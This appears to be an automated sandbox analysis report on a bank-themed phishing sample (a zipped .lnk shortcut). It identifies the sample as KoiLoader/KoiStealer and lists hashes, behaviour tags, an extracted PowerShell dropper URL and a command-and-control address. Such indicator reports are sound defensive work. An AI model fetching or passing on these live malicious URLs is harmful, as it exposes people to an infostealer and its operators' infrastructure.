General

  • Target

    chase_apr_2025.zip

  • Size

    878B

  • Sample

    250501-zd5b9sfp5s

  • MD5

    a2ff988165e14b0b9f57918c810cbcb2

  • SHA1

    c7f80cf66c9ecca0278d41f6724face262225e9e

  • SHA256

    c6a75ac0fee7c4be487eff214bba103b0b8f109c64c6ad818b1f1140f00ba9af

  • SHA512

    6e8f0a6482301912cc40d08a975d747fbcbb46d3fe75fd2979bec41194b4632d6d190ee88acc3ef875d7a843ae1ff64b408c10220b1e206139c42b33f1b4e6c9

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://maconsmallbusinesses.com/wp-content/uploads/2018/08/urobenzoicHQ7v.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://maconsmallbusinesses.com/wp-content/uploads/2018/08

Extracted

Family

koiloader

C2

http://82.118.16.176/punctulum.php

Attributes
  • payload_url

    https://maconsmallbusinesses.com/wp-content/uploads/2018/08

Targets

    • Target

      chase_apr_2025.lnk

    • Size

      1KB

    • MD5

      8801711cde4f2ceb0d7fbce61920a543

    • SHA1

      8042a5de003d7adcfde86a25e3c085edfa9d48dc

    • SHA256

      2a1844690be2dcbaa2b3975e529ff5e8a18a5620e4ee7429f2040f8fc4a6c76e

    • SHA512

      9c3743814519353200248c370dd3e60c61db9869aa40b22d662cbf55ab066300eee0a9ca422d784bdb9fa1522f55e4eb9c959f4b4c46098c2b5355e8fb028b56

    • KoiLoader

      KoiLoader is a malware loader written in C++.

    • KoiStealer

      KoiStealer is an infostealer written in C#.

    • Koiloader family

    • Koistealer family

    • Detects KoiLoader payload

    • Detects KoiStealer payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Indicator Removal: Clear Persistence

      Clear artifacts associated with previously established persistence like scheduletasks on a host.

MITRE ATT&CK Enterprise v16

Tasks